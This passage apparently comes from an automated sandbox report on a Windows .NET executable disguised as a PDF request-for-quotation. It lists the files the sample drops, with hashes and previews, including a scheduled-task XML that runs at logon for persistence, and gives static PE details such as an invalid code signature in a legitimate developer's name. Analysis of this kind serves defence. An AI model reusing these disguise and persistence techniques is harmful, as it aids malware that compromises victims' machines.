                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:true
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RAangyFeHdZLco.exe.log

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.34331486778365
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                                  Malicious:false
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):2232
                                                                                  Entropy (8bit):5.380805901110357
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeoPUyus:lGLHyIFKL3IZ2KRH9OugYs
                                                                                  MD5:A9155A6B0927A3C0F28D51A6B7113A96
                                                                                  SHA1:02E3CEAD53BE46D65C1BED154A51707D856DFEA2
                                                                                  SHA-256:168BD0354D375B14667BB2E7BD23754D06F31D46707329A334FAB6394BCF74BD
                                                                                  SHA-512:AA1D2C2D7825C02187712FB2AA6F0408E88D8A5F3C95ED1406BFCED825CFA965D53531893E7E655A04A058877A779A35AD6F73FB0A9A40A105B950083330D80E
                                                                                  Malicious:false
                                                                                  Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                  C:\Users\user\AppData\Local\Temp\00255Of2

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\msinfo32.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                  Category:modified
                                                                                  Size (bytes):196608
                                                                                  Entropy (8bit):1.1215420383712111
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:r2qOB1nxCkvSAELyKOMq+8HKkjucswRv8p3:aq+n0E9ELyKOMq+8HKkjuczRv89
                                                                                  MD5:9A809AD8B1FDDA60760BB6253358A1DB
                                                                                  SHA1:D7BBC6B5EF1ACF8875B36DEA141C9911BADF9F66
                                                                                  SHA-256:95756B4CE2E462117AF93FE5E35AD0810993D31CC6666B399BEE3B336A63219A
                                                                                  SHA-512:2680CEAA75837E374C4FB28B7A0CD1F699F2DAAE7BFB895A57FDB8D9727A83EF821F2B75B91CB53E00B75468F37DC3009582FC54F5D07B2B62F3026B0185FF73
                                                                                  Malicious:false
                                                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1kt5ws53.qed.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3h2y2ae5.yfh.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bvszb542.fai.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gusrxhhp.0qu.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzzth2i4.ikg.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q4j41525.bsv.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ryxruex1.mow.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xmm4pbx2.1k4.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\tmp78E.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1608
                                                                                  Entropy (8bit):5.122887345938021
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoHxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuToRv
                                                                                  MD5:57C0076D1244E05359994F5D658C9AB2
                                                                                  SHA1:436D4BF54E6D4CC7DAB566077036E00245F310D1
                                                                                  SHA-256:F82150B3A92B4E4FF349CA97E47246386345C434F5DFCD80284BE5F35CA0F999
                                                                                  SHA-512:E5BDC52229CB124BDA1183EAB915B278F3481E93D5540B1585D3F16627DA4A6F244C60FFBF33E07350E3C0F772CFBF1F958BE85F48FED81924D7B65FF1ED1C9E
                                                                                  Malicious:false
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                                  C:\Users\user\AppData\Local\Temp\tmpEC94.tmp

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                  Category:dropped
                                                                                  Size (bytes):1608
                                                                                  Entropy (8bit):5.122887345938021
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtoHxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuToRv
                                                                                  MD5:57C0076D1244E05359994F5D658C9AB2
                                                                                  SHA1:436D4BF54E6D4CC7DAB566077036E00245F310D1
                                                                                  SHA-256:F82150B3A92B4E4FF349CA97E47246386345C434F5DFCD80284BE5F35CA0F999
                                                                                  SHA-512:E5BDC52229CB124BDA1183EAB915B278F3481E93D5540B1585D3F16627DA4A6F244C60FFBF33E07350E3C0F772CFBF1F958BE85F48FED81924D7B65FF1ED1C9E
                                                                                  Malicious:true
                                                                                  Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.

                                                                                  C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):817160
                                                                                  Entropy (8bit):7.71034558477349
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:hcdY9shQgAlUVHqVMvdv6R6epIkvW3wmf2AYzdPfuOY4gx8G6m3Ef0h4vFvC6kR:KdhlqVOGIk9mfrYzduOYl+G6/g4vNCZ
                                                                                  MD5:198FADC2115110C8B0B774C88C70215E
                                                                                  SHA1:619B8AF2BF8C70EA469A7866CC4ED78A38BC59C1
                                                                                  SHA-256:78AB8447457BCF006649029303778DC4D8CFB3A3E6E38DE1B17D9BE17401BC2B
                                                                                  SHA-512:A80C4EBCAF746345CF931C491130487A7B9C746A48347E422D8CB6EB71433B50F0F04BFEB7374834523B1F0EFBBF5D897F3F5FC425CC273764CC4FC8071C816B
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....YVg..............0......(.......7... ...@....@.. ....................................@.................................87..O....@...$...........B...6........................................................... ............... ..H............text........ ...................... ..`.rsrc....$...@...&..................@..@.reloc...............@..............@..B................l7......H.......$L..L{..........p....o...........................................0...........(.....(.....{...........%.r...p( ...s!....%.r...p( ...s!....%.r%..p( ...s!........T...%.b...("...s!...(#...rA..p ............%...%...o$...&*....0..^........{....o%....{.....A.Zo&....[...o'...&.{....o%...o(....>"....{....o%...o)....{....o%...r_..po'...&.{....o*...ru..pr_..p.(+....@.....{....o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,...(-...o.....{....r...p.{....|....(,.

                                                                                  C:\Users\user\AppData\Roaming\RAangyFeHdZLco.exe:Zone.Identifier

                                                                                  Download File
                                                                                  Process:C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:true
                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.71034558477349
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:NEW.RFQ00876.pdf.exe
                                                                                  File size:817'160 bytes
                                                                                  MD5:198fadc2115110c8b0b774c88c70215e
                                                                                  SHA1:619b8af2bf8c70ea469a7866cc4ed78a38bc59c1
                                                                                  SHA256:78ab8447457bcf006649029303778dc4d8cfb3a3e6e38de1b17d9be17401bc2b
                                                                                  SHA512:a80c4ebcaf746345cf931c491130487a7b9c746a48347e422d8cb6eb71433b50f0f04bfeb7374834523b1f0efbbf5d897f3f5fc425cc273764cc4fc8071c816b
                                                                                  SSDEEP:12288:hcdY9shQgAlUVHqVMvdv6R6epIkvW3wmf2AYzdPfuOY4gx8G6m3Ef0h4vFvC6kR:KdhlqVOGIk9mfrYzduOYl+G6/g4vNCZ
                                                                                  TLSH:27050158A76DD513DA840B349EB5F6B8256C5E8DF811D203AED9BFAF3C72B142C14283
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....YVg..............0......(.......7... ...@....@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:17692632b3936907

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x4c378a
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:true
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x675659D2 [Mon Dec 9 02:45:38 2024 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Authenticode Signature

                                                                                  Signature Valid:false
                                                                                  Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                  Error Number:-2146869232
                                                                                  Not Before, Not After
                                                                                  • 12/11/2018 19:00:00 08/11/2021 18:59:59
                                                                                  Subject Chain
                                                                                  • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                                  Version:3
                                                                                  Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                                  Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                                  Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                                  Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  push ebx
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  jnc 00007F045CC5F382h
                                                                                  je 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  add byte ptr [ecx+00h], al
                                                                                  arpl word ptr [eax], ax
                                                                                  je 00007F045CC5F382h
                                                                                  imul eax, dword ptr [eax], 00610076h
                                                                                  je 00007F045CC5F382h
                                                                                  outsd
                                                                                  add byte ptr [edx+00h], dh
                                                                                  push ebx
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  jnc 00007F045CC5F382h
                                                                                  je 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  add byte ptr [edx+00h], dl
                                                                                  add byte ptr [esi+00h], ah
                                                                                  insb
                                                                                  add byte ptr [ebp+00h], ah
                                                                                  arpl word ptr [eax], ax
                                                                                  je 00007F045CC5F382h
                                                                                  imul eax, dword ptr [eax], 006E006Fh
                                                                                  add byte ptr [ecx+00h], al
                                                                                  jnc 00007F045CC5F382h
                                                                                  jnc 00007F045CC5F382h
                                                                                  add byte ptr [ebp+00h], ch
                                                                                  bound eax, dword ptr [eax]
                                                                                  insb
                                                                                  add byte ptr [ecx+00h], bh
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  dec esp
                                                                                  add byte ptr [edi+00h], ch
                                                                                  popad
                                                                                  add byte ptr [eax+eax+00h], ah
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al

                                                                                  Data Directories

                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xc37380x4f.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x24ec.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0xc42000x3608
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xc80000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                  Sections

